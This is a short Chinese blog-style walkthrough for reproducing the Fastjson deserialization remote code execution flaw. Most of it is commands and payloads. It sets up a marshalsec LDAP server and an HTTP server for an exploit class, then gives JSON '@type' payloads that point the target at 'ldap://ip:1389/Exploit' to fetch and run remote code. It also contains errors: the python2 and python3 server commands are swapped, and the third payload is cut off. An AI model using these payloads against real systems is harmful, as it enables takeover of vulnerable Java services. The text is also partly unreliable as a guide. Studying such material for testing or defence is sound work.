Fastjson 远程代码扫描漏洞复现

  1. 环境搭建
    1)反序列化攻击工具源码下载:https://github.com/mbechler/marshalsec
    使用maven命令:mvn clean package -DskipTests 编译成.jar文件
    启动(默认端口1389):java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://ip/#Expolit
  1. 编写Expolit.java文件
    使用javac Expolit.java,编译成为class文件
    python2: python -m http.server 80
    python3: python -m SimpleHTTPServer 80
  2. payload:
    {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://ip:1389/Exploit", "autoCommit":true}
    {"@type":"org.apache.xbean.propertyeditor.JndiConverter","dataSourceName":"ldap://ip:1389/Exploit", "autoCommit":true}【ip也可直接在http://dnslog.cn/中获取】
    {"a":"a\x

参考:
https://www.cnblogs.com/Akkuman/p/11190475.html
https://github.com/RealBearcat/Fastjson-Payload

相关文章:

  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2022-01-22
  • 2018-11-19
  • 2022-01-31
  • 2022-01-25
猜你喜欢
  • 2019-09-02
  • 2021-07-30
  • 2022-01-03
  • 2021-09-15
  • 2021-11-30
  • 2021-08-13
  • 2022-02-25
相关资源
相似解决方案